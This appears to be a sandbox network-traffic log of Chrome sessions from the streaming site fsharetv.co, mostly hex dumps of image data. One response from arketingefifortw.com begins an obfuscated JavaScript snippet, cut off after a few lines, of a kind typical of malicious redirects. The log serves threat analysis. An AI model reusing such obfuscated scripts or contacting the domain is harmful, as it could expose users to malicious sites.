                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: cd 33 e7 c4 a9 d3 8e 23 42 e0 8f 0e f9 20 d5 ad b4 97 b2 61 79 04 86 dd 3e 50 5e 89 42 35 72 dc 73 c2 cd 28 50 09 00 9e 4c 76 0a 2f 65 93 0a a1 ba f3 77 12 79 27 ee 35 14 08 4f 76 8b 53 5c 35 af b6 37 2e f7 92 fb 9b 07 92 b3 5b 52 cd 8a 8e f7 4a 9e f8 b2 f6 b7 e4 a4 42 33 17 26 a6 a3 bf 56 c0 45 7f 58 27 89 e1 8d a6 9b 91 ec 56 14 9b be c4 33 4a 4e 22 e0 f3 de 49 ac c2 6c eb 03 98 0a ad 08 e6 57 d9 67 73 d5 73 51 ca a3 b9 bc 9c 49 a8 4a b5 b6 92 e5 f4 44 48 f8 d8 75 5b 8e 45 d8 9d 43 bc 64 b2 f1 dc a8 97 e9 c9 7b c1 6d f3 b7 c1 42 e4 bc ba 76 55 f8 ef 88 fe 93 62 ba a3 60 42 32 79 a9 1f 24 d7 13 71 2b 17 a9 a3 10 43 7d 0d 76 ae d5 a8 ad 28 c4 47 7a c7 a4 17 0d 11 ca c1 2d c9 40 7d 00 cf 61 72 de dc ac 49 2c ab 27 70 31 56 32 29 4e 92 47 6f 3b f7 30 58 88
                                                                                                                                                                                          Data Ascii: 3#B ay>P^B5rs(PLv/ewy'5OvS\57.[RJB3&VEX'V3JN"IlWgssQIJDHu[ECd{mBvUb`B2y$q+C}v(Gz-@}arI,'p1V2)NGo;0X
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1350INData Raw: a0 c1 14 4d 47 69 27 dc 7a f0 cb ac 71 ce d9 91 cf a1 5a f3 dc 45 0a ca 2a 2b 39 01 ef 74 f8 01 6a 4e e2 95 3a 23 b8 93 2a 45 42 9d 59 2d 85 6e 1d ae 6a e7 c9 ad 71 e7 75 1f 6c b2 89 d7 6f 5c d7 7a c1 ac 52 47 db 35 22 bc 07 b8 90 2d 45 c4 92 32 ed c4 13 9a f6 17 56 92 2c 81 d5 65 05 4b 71 7e d6 4d d1 79 2f ac cb 33 24 77 04 52 29 98 7c e7 f8 36 b5 23 99 7b 9e 32 c0 af d4 7e b2 e3 2b 7b 2c 59 cd 11 b1 3e 83 34 0f 7c 82 52 4f 3f 6f 8f 3d ea 21 af c9 9c d2 29 73 aa d9 1e 90 69 2a d1 be ea b8 1d df d3 52 3d 47 7a d7 34 1c 03 9a 66 d8 8d 61 11 ea fd 50 ff 00 8a 17 2e 9f 6d b2 a9 41 52 4c f3 1c ba 5d cd 17 db ef ee 33 9a b7 e6 67 8c fc ad f9 78 65 c0 a6 0b 27 96 b6 07 b0 1c 72 a8 6c 5b f1 70 c4 5f 44 e2 d5 19 5d 45 f2 be f5 c8 dd 83 36 d1 b9 fc d7 50 8a f1 5b
                                                                                                                                                                                          Data Ascii: MGi'zqZE*+9tjN:#*EBY-njqulo\zRG5"-E2V,eKq~My/3$wR)|6#{2~+{,Y>4|RO?o=!)si*R=Gz4faP.mARL]3gxe'rl[p_D]E6P[
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 5b f2 08 98 cc 17 9e da 22 f2 db dd a5 f8 78 64 b9 e3 cd ae 58 83 da 8a c5 22 e1 0b 1c f6 82 6c ed 90 10 9d a8 d3 1a ed 56 d7 11 a4 4a 19 e7 88 a1 15 0d c4 7d 38 aa 49 90 ad c8 a6 9e 17 6c d4 6f 1c 8b 93 c8 f7 71 4a 68 dc 6c fa 0d bf 01 d8 ae 05 4f 76 22 46 8d 6d 66 db 0a 27 97 a6 84 92 7b 57 27 6a 55 c3 24 36 82 15 ea 49 2c 86 56 2c 71 4a 07 e4 8f c5 12 7b d4 0b b3 d2 da 40 c9 57 f6 c2 16 1a 57 03 07 79 25 ae 69 f3 2a a8 ab 8b c9 2e b4 2e 0e 69 d1 8a 92 47 9a d3 15 63 30 58 90 52 5c 20 3d ed ee 93 a6 8a 7d c4 63 bd 45 22 87 91 ab af 1e e9 5d 74 31 b1 a9 cc 42 22 06 61 da ad de 21 14 55 c9 eb b7 d3 44 cd 59 b8 6c 90 36 72 4b 3b 60 16 3c af 69 6a d2 73 1e 71 71 75 d4 d1 6a 23 5d 31 e0 5e dd 99 7b 15 15 a8 34 eb 8f 15 a9 3e 21 25 18 11 10 54 41 99 e0 46 52
                                                                                                                                                                                          Data Ascii: ["xdX"lVJ}8IloqJhlOv"Fmf'{W'jU$6I,V,qJ{@WWy%i*..iGc0XR\ =}cE"]t1B"a!UDYl6rK;`<ijsqquj#]1^{4>!%TAFR
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 5f 28 ec 53 ba 28 ae 48 60 65 f0 5f 23 4f 9c bb e8 46 0b 27 64 10 d9 f4 18 1a 36 1b 03 42 8e 85 14 11 5c 93 a6 45 36 0a 27 07 05 0c 14 fb 33 a0 8a 2e 8e 4e 4a 7d c2 08 e0 af 9d 0f 41 d8 21 90 86 a7 03 61 80 86 83 f1 cf 49 45 72 c9 c9 e8 3a 1c 37 51 43 61 86 47 2d d4 57 2d 19 fa 9b 07 52 8a 6d 5b 23 52 c8 32 fb 2f 97 64 1d 3b a6 d4 a3 d6 17 16 c7 ff c4 00 43 10 00 01 02 04 01 08 08 04 04 05 04 01 05 01 00 00 01 00 11 02 21 31 41 51 03 10 12 32 61 71 81 a1 20 22 42 91 b1 c1 d1 f0 52 a2 e1 f1 13 30 62 92 40 72 82 b2 e2 23 33 53 d2 c2 04 43 50 63 93 a3 ff da 00 08 01 01 00 09 3f 02 ff 00 e0 2e 8d db 8e 19 ad d2 87 4b 44 d3 11 17 56 21 dd 3e 0a b0 e5 32 63 17 d0 8b 5b 8d 54 37 c9 cf 46 7d 5c af a7 59 06 3a 14 b8 33 f7 ec 2b 8f fd 3d b7 bf 77 24 3a da 0f a3 b5
                                                                                                                                                                                          Data Ascii: _(S(H`e_#OF'd6B\E6'3.NJ}A!aIEr:7QCaG-W-Rm[#R2/d;C!1AQ2aq "BR0b@r#3SCPc?.KDV!>2c[T7F}\Y:3+=w$:
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 04 64 69 88 e3 f6 51 7c 1f e7 de 04 b7 94 6d 17 69 bb 4f 0f 70 92 eb 1d 02 3e 1b b8 c5 48 d8 e0 43 11 cc 22 d0 c5 15 01 9e a0 80 4f 61 0e 8c b4 a3 bd 8d 13 34 e4 ff 00 a8 45 0f 21 c1 5f 25 95 87 f7 b3 28 ba a6 cf 3d 50 2b b0 cf 8b a3 d5 ff 00 52 5a 47 b4 41 87 b9 16 7f c2 df d4 24 9e fa 28 a7 27 38 b6 cd b7 be d4 cc f1 f3 2e 3e bf 97 48 82 a6 c5 75 4c 9c e7 47 c7 85 94 52 c5 6b e4 98 83 48 b8 ec 2a e3 c7 a4 59 3f 72 3c 7f 88 0f a1 c9 ed c1 1e b6 18 2f 84 2c a6 8c f5 86 22 4b 27 1c 62 32 1e 3c 77 2c a1 88 90 64 70 45 c0 00 3e ee 8f 64 15 35 34 1b 6a ec f9 ff 00 04 3a 36 39 83 c0 2f 70 8b 83 94 3f 38 fa 2c b4 32 c7 25 a6 4f bd 8c a2 32 05 e3 ba a7 46 85 6c 6d ca 45 11 14 bb 95 63 25 fc 1b f8 1a 9a 43 75 00 1c 1f 9a e7 08 52 8c 77 1c f7 8c f9 2a cb 4c e2 7d
                                                                                                                                                                                          Data Ascii: diQ|miOp>HC"Oa4E!_%(=P+RZGA$('8.>HuLGRkH*Y?r</,"K'b2<w,dpE>d54j:69/p?8,2%O2FlmEc%CuRw*L}
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1350INData Raw: 72 a4 c1 09 8b ef d8 b9 96 cd 81 27 fa 7d b2 ac 24 73 92 39 83 22 a1 05 af 45 92 87 b9 01 dd d0 d5 89 55 64 f4 e0 ed 62 d8 85 18 30 ed d6 dd 9a ea a1 4e 13 76 72 a4 7e 52 8b 68 d4 60 a6 36 d5 5d f3 cf 13 86 f4 4c 79 56 ea 97 98 e1 6f 34 35 9a 62 8f e4 a7 04 47 f6 be 28 f1 50 3b 70 59 3d 13 bd 09 41 84 d6 25 0a aa 66 3a 92 ee eb 14 2b ff 00 6e 8c 55 51 52 f5 45 87 79 3f cd 17 a2 bf 42 20 e3 bc 8a 2a 17 77 f1 0a b8 b2 ef 51 f0 1e aa 26 20 4d e8 ca 0a d2 6d 55 91 86 1d 8e c4 f9 20 ce 67 09 92 84 0f d3 75 ab 08 cc 1c f2 1b 4a 99 fe e2 99 cd d1 20 ec 92 94 bf 72 fd 9e 8a 44 5a eb 5a 2e 43 6a ab ac 17 d2 6a b8 66 8e 4e 0c 50 b3 e9 3c 9d fd ba 32 1a 26 11 fc d3 ce 51 e8 e4 a2 ce 7f db a9 fd 57 ee a2 83 44 ec 32 ee cd 01 8c d4 81 c9 01 92 fe e4 49 8b 14 1c 58 3c
                                                                                                                                                                                          Data Ascii: r'}$s9"EUdb0Nvr~Rh`6]LyVo45bG(P;pY=A%f:+nUQREy?B *wQ& MmU guJ rDZZ.CjjfNP<2&QWD2IX<


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          92192.168.2.164982513.227.8.84436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:11 UTC712OUTGET /M0xOQ0JSLiM3 HTTP/1.1
                                                                                                                                                                                          Host: arketingefifortw.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1024INHTTP/1.1 200 OK
                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                          Content-Length: 1499
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:11 GMT
                                                                                                                                                                                          Accept-CH: DPR, Width, Viewport-Width, Device-Memory, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List
                                                                                                                                                                                          Set-Cookie: AWSALB=TDYilUxhsUoCOBa2e2mZLho4r1wbn7yH9WgppwaEQ2sjXUgJQr8q4Rm/GXpKF2lsD7wmzRd3FYKjEhxmOd+t15VEYIeH515YNAjrJWZf/e5fEp+/5KUaGhbaRYgH; Expires=Sun, 22 Dec 2024 11:38:11 GMT; Path=/
                                                                                                                                                                                          Set-Cookie: AWSALBCORS=TDYilUxhsUoCOBa2e2mZLho4r1wbn7yH9WgppwaEQ2sjXUgJQr8q4Rm/GXpKF2lsD7wmzRd3FYKjEhxmOd+t15VEYIeH515YNAjrJWZf/e5fEp+/5KUaGhbaRYgH; Expires=Sun, 22 Dec 2024 11:38:11 GMT; Path=/; SameSite=None
                                                                                                                                                                                          Server: openresty/1.17.8.2
                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate, no-transform
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          P3P: CP="NID DSP ALL COR"
                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                          Via: 1.1 f367333500910c6c273feb3cd648ebec.cloudfront.net (CloudFront)
                                                                                                                                                                                          X-Amz-Cf-Pop: BAH53-C1
                                                                                                                                                                                          X-Amz-Cf-Id: fQx-DwIDCqRMg2bp1Nlij8VV8B_bROvVfRRS85_OqWcFAldp4oBhhg==
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1499INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 70 36 6a 6a 6a 6a 2e 6a 3d 66 75 6e 63 74 69 6f 6e 20 28 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 70 36 6a 6a 6a 6a 2e 41 2e 65 3d 3d 3d 27 66 75 6e 63 74 69 6f 6e 27 3f 70 36 6a 6a 6a 6a 2e 41 2e 65 2e 61 70 70 6c 79 28 70 36 6a 6a 6a 6a 2e 41 2c 61 72 67 75 6d 65 6e 74 73 29 3a 70 36 6a 6a 6a 6a 2e 41 2e 65 3b 7d 3b 70 36 6a 6a 6a 6a 2e 53 3d 27 2a 27 3b 66 75 6e 63 74 69 6f 6e 20 70 36 6a 6a 6a 6a 28 29 7b 7d 70 36 6a 6a 6a 6a 2e 4c 3d 66 75 6e 63 74 69 6f 6e 20 28 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 70 36 6a 6a 6a 6a 2e 41 2e 65 3d 3d 3d 27 66 75 6e 63 74 69 6f
                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><script>function l(){p6jjjj.j=function (){return typeof p6jjjj.A.e==='function'?p6jjjj.A.e.apply(p6jjjj.A,arguments):p6jjjj.A.e;};p6jjjj.S='*';function p6jjjj(){}p6jjjj.L=function (){return typeof p6jjjj.A.e==='functio


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          93192.168.2.1649828151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:11 UTC676OUTGET /images/M/MV5BNTgxOGZjYzMtMDkzOS00ZTA5LTg3MmUtM2IyMWRiMzQwYjMxXkEyXkFqcGdeQXVyNjMxODMyODU@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:11 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 34350
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: a429f27f-4ebb-4dce-82e1-5d238de4edf1
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Thu, 16 Jun 2016 18:40:09 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Mon, 10 Oct 2044 00:25:28 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 920873
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:11 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200078-IAD, cache-ewr-kewr1740022-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c7 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 06 03 04 05 07 00 02 08 01 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e8 a7 5a ec 96 87 bb 6a a5 a3 dd d7
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"6Zj
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1364INData Raw: a9 57 69 ce 50 d7 85 76 3d 2e 93 80 21 12 ae 64 37 29 f4 94 35 1e 1b b1 0f 61 a0 35 35 ab 55 5c 0d 30 26 b3 47 5e 6e ae f7 6a b0 ca d4 54 b4 5d ec a1 dd 6c a5 2e 0a c5 ea ed 1e 41 6d 74 56 6b 20 4e 29 2f 5b d6 91 d2 cc 76 04 dd 67 4e e2 ca de a0 36 42 8f 15 78 32 a9 19 20 de 02 40 90 3d 10 42 cf 05 ce 7a ea b0 2b 51 ce a2 bd 37 05 09 6e 15 14 70 6c fa 33 67 3e 67 69 92 41 1f 0a 10 11 62 e5 ae c4 d4 04 ab e8 e5 92 c7 5e a6 17 f2 32 57 43 a4 ee 16 2e 08 c8 4f 37 19 f1 ec f2 df 07 26 3a 1d 40 58 55 6d b4 62 76 75 31 a4 83 2b 15 9d a0 8b 6a ea f1 90 9a 76 9a cd 00 47 30 8c c5 84 c9 fb 48 79 82 8e 62 78 74 95 d5 03 29 5b 86 95 0e 8f 4e 2a d5 d1 73 6b 3d 66 8b 16 65 20 53 ea de bc 93 a8 79 a4 59 9c af 4c 86 7a ca b9 49 d2 c5 61 0b 62 0b 3b 91 55 cb d8 05 ec 2d
                                                                                                                                                                                          Data Ascii: WiPv=.!d7)5a55U\0&G^njT]l.AmtVk N)/[vgN6Bx2 @=Bz+Q7npl3g>giAb^2WC.O7&:@XUmbvu1+jvG0Hybxt)[N*sk=fe SyYLzIab;U-
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: e1 0e 7d bf 2b 96 8c 91 95 6e f8 ad 74 55 af c4 f6 ce 74 df 69 7b e6 33 0a 2a f6 05 e0 c9 38 06 b3 5a a4 22 04 2d d3 23 49 4f 5c 32 2a 92 77 78 bd d0 10 32 69 65 20 50 97 a2 33 62 bb 98 43 76 88 5c 43 72 b7 35 a8 63 f3 18 d6 aa c5 12 c6 5d 3c d7 e0 bb a4 34 5a ca 43 d8 c7 c4 17 9b 93 59 55 61 a7 46 db d6 4e d7 80 d4 05 5d cc 59 47 33 14 43 3c b7 3b ea e8 af 33 33 4c 5c 75 07 a4 4a ab 2c d5 1f 44 03 c2 8a 5a 9f af 77 6a dc cc 54 95 fa 0f 7e 27 83 35 7b b3 6e 5a 95 a7 57 5d 22 29 56 bb 17 f4 95 27 8b 5a db a8 9e 57 0c d4 d6 39 f4 61 2b d8 1a 28 8f 9a 3d 29 14 64 c3 ca 2f cd 77 a8 49 9e d0 48 15 c1 7c 82 11 c6 cf cb 02 e1 8b da 71 3a 53 59 7a 4e d9 51 b1 2f 19 6e 56 4e f0 6a 7e ae 4d 44 2d 3b a0 3a 1c c2 d3 db 70 15 6b 5b 7f 4e 9a ad 4b 43 7e ee 7d 91 b0 06
                                                                                                                                                                                          Data Ascii: }+ntUti{3*8Z"-#IO\2*wx2ie P3bCv\Cr5c]<4ZCYUaFN]YG3C<;33L\uJ,DZwjT~'5{nZW]")V'ZW9a+(=)d/wIH|q:SYzNQ/nVNj~MD-;:pk[NKC~}
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 24 fb b6 cd a5 b3 4a 76 0f 1e cd 42 2d 92 6e ac d4 56 cf 2f 88 21 10 ae d0 da 6c 9f a3 65 28 ab 7b 69 3b 8b 57 43 74 6e 00 b1 94 d2 e9 b2 1a b6 8b b2 9b 4e a3 21 69 08 a0 71 51 72 eb d2 eb fb af 5a 5f d5 bd f9 02 b5 1b d7 b7 c2 ac 73 1b ab 79 23 36 f3 22 ee 49 20 ec 4a 9b 23 b8 80 c0 e5 0e c2 00 6a d3 a5 13 23 5b bc 7a 6c ac c5 6a da c9 6d f9 ea ee a9 cb 3e ad 10 38 4f 35 e6 bb 6b fd 29 ac 56 56 dc 45 84 42 92 04 4f 14 f6 2a 5b 75 41 1a c7 c2 f5 b3 b8 64 6f 4f 31 38 e6 ae 75 27 97 84 d9 9e 6a 39 bb 8b d9 92 36 6b 77 06 a5 d3 a2 b9 1d c8 e7 b2 7b 7e 59 43 5e 44 d9 d3 a0 66 c8 68 6d a1 b5 34 b2 06 38 15 3d c2 40 32 fe ae 7b af ec 47 a4 a9 f9 4c 91 2c 7c 2b 30 50 49 b9 d7 71 c4 53 5e 4a ff 00 61 2b a1 cd 69 d7 65 f0 a7 15 71 7d 72 8e d8 fe 6a 71 5a 6d e4 97
                                                                                                                                                                                          Data Ascii: $JvB-nV/!le({i;WCtnN!iqQrZ_sy#6"I J#j#[zljm>8O5k)VVEBO*[uAdoO18u'j96kw{~YC^Dfhm48=@2{GL,|+0PIqS^Ja+ieq}rjqZm
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 52 d0 eb 2b 91 c5 0c 9a d8 47 9d d8 a1 25 77 28 49 4a f4 1b 3e 1d b3 d4 52 2d 5a 8d 89 93 d0 1c f4 d9 87 73 53 64 29 da 88 5d f6 8e c2 91 5a 85 a2 a2 6e ad 3c 61 45 7f 90 a9 53 7a b2 d4 27 2b 52 af 71 08 ab 79 b2 82 af 0b a0 e5 2b 75 49 4b 59 af f5 5b b1 e4 61 cd 2c 40 53 e0 8a 68 f3 cd 76 a8 41 5d 9a db 8a 8b e3 f2 2d d3 14 ab 56 f1 6e 38 a9 38 c0 a6 38 51 41 be 26 97 c1 a8 cf 14 7e cd 4c 33 56 10 f2 f2 74 d4 53 74 66 ac db f1 8a 23 3d 24 8f b3 25 73 9e 2d e1 ed 28 5a d4 be 82 90 71 41 71 47 f7 43 f5 d0 d1 5c d4 76 e1 4e 68 9a 66 ac 8a cd 6e ad d4 ca 69 ee 84 83 6a 9a c5 28 ab 48 37 64 95 01 3c 0f 97 96 e6 81 ac ed 14 2e 2a 4e 46 e1 9f dd 5b 0c 46 bd 2f db 11 35 58 bf dc 50 e9 a8 f1 db 35 67 b9 fe 55 e0 d5 ef ff 00 18 a1 d3 b5 48 78 e8 7c f4 dd 8a 69 68
                                                                                                                                                                                          Data Ascii: R+G%w(IJ>R-ZsSd)]Zn<aESz'+Rqy+uIKY[a,@ShvA]-Vn888QA&~L3VtStf#=$%s-(ZqAqGC\vNhfnij(H7d<.*NF[F/5XP5gUHx|ih
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1350INData Raw: f1 bb fd f9 a9 6c a3 90 a1 6e f7 cb 35 78 c6 52 b1 a2 a8 50 14 63 de 2a fd be 50 2d 4a 3b af 1c 75 7f 26 12 ad 57 09 42 be d5 1c 74 65 58 fc c4 8d 79 48 81 06 05 49 2e da 4d df bb 99 82 2b 54 c3 66 c3 51 ae 7c 98 f8 da 91 42 b0 0d a8 4f b0 57 d1 b1 52 23 79 51 75 18 e2 84 a2 4e 14 c2 c5 a9 72 07 01 83 72 28 7b 80 ab b9 f7 dd 05 16 8b ba 59 1a b5 23 81 56 e3 8a c5 44 94 80 ce 76 c7 1e 95 12 79 6b 1e 72 9e 99 a8 43 25 7a 5c 1d c9 7b 73 2c 00 0a dd 83 cd cf 3b 05 46 38 15 17 cd 65 15 04 bd d4 56 f7 5c 70 bb ba 4a 9b 98 56 d1 45 fc 07 c7 f8 b3 82 09 60 ac 18 64 67 a6 3d 97 77 1d 88 99 e9 2d c4 46 ac 47 f7 2b 53 ab 7f a8 a0 5f 3c 10 4c 91 ac a8 a0 00 07 41 8a f8 d6 c8 cd 4d 66 93 a9 5a b8 b4 6b 76 db 27 d9 cd 46 d5 6b fd c9 05 69 f3 6d 79 20 f7 11 b8 10 6d a5
                                                                                                                                                                                          Data Ascii: ln5xRPc*P-J;u&WBteXyHI.M+TfQ|BOWR#yQuNrr({Y#VDvykrC%z\{s,;F8eV\pJVE`dg=w-FG+S_<LAMfZkv'Fkimy m
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: c2 d6 69 a4 55 f2 8e 1f c3 04 f5 2d dc b1 f4 cb bc c1 fc b5 bd 5c df c5 6c 70 f6 da 9c 77 0f b1 7f 96 b9 97 76 cb 9b d7 b9 b5 c9 b2 d3 7b ea 24 3d 24 82 5d c6 b0 91 7c 9b 3f 93 80 94 56 b1 53 2b 1c 6d 5e e2 f1 5f 3a 2c f5 96 ff 00 28 a5 fd 30 ac f4 14 2b 5c fe d2 56 93 79 15 ba 38 7d 74 e4 c4 6b 54 fe d5 a5 6e 65 05 6a 5f fd 04 55 a5 47 fe 55 a7 5d fa 69 77 16 90 cb 2e e3 aa b0 96 e7 69 d0 e6 c3 bc 75 7f 67 6e 04 af 56 1f 5b 9a d2 2d 23 9c 39 7d 53 9b b4 ab 45 0b 7e e0 5a 77 73 22 c5 73 6a 6d ad 00 6b 5b 04 95 55 cf 46 4c d4 89 f1 38 e3 c1 83 25 46 ee 98 a3 6e ac 73 5e 9d 69 ad c5 76 02 9c d6 da 47 29 4a e1 ba ad 5d da 0b a4 da 7f 81 ab cd 33 d4 ec ab bd 37 d4 08 c5 5c 69 2b 30 8e 9f 4c dd 02 c1 56 7a 7b db b6 48 d0 80 56 c9 d1 d4 f6 ca 9d 39 04 fb e5 5d
                                                                                                                                                                                          Data Ascii: iU-\lpwv{$=$]|?VS+m^_:,(0+\Vy8}tkTnej_UGU]iw.iugnV[-#9}SE~Zws"sjmk[UFL8%Fns^ivG)J]37\i+0LVz{HV9]
                                                                                                                                                                                          2024-12-15 11:38:11 UTC1378INData Raw: 7c 86 c0 33 85 33 5b ea 42 ac 5c 8b 06 db 24 a2 44 0e 2b 5b fb 8d a3 ff 00 ea 3d 6d ce f0 c5 df 2b f2 d1 d6 8f 46 1b 66 ca c8 d2 0a fe f6 12 37 53 b1 52 bb 2c 45 9d c7 af 48 fb c0 31 dc 2f db f2 8e 64 d8 36 3b ed 59 e3 4d 76 c6 7f 19 49 14 ac 95 df c9 1f 8c 9f 6c 80 2a 28 09 3f 57 2c 12 c1 59 4c 99 35 c9 2c 11 da 0e 3f 7f b3 24 cb 12 e8 ad ed fa c6 b8 8a 00 54 90 3a 03 85 7d 62 2f 57 39 bc 9a b0 99 42 99 23 58 27 ea cd 60 12 4a bc a5 53 db a8 31 95 ca bc 90 4f d2 6f 30 6f b8 6c f6 72 1a 55 d1 df f8 a8 80 6e 56 fe 74 77 f4 26 85 c6 c8 68 41 d0 74 07 d8 47 01 46 35 90 06 35 d2 03 4a 7f 96 5e fd 0c 57 fc 9d 41 b4 7f da e7 21 d3 8e cd 61 8a 7d 2b 1f 60 b3 14 93 3b b0 20 e4 76 48 27 26 60 c0 66 f0 5a 93 c7 e2 48 78 a3 f6 cb 45 80 c3 12 ae cb 41 32 92 1a 46 b6
                                                                                                                                                                                          Data Ascii: |33[B\$D+[=m+Ff7SR,EH1/d6;YMvIl*(?W,YL5,?$T:}b/W9B#X'`JS1Oo0olrUnVtw&hAtGF55J^WA!a}+`; vH'&`fZHxEA2F
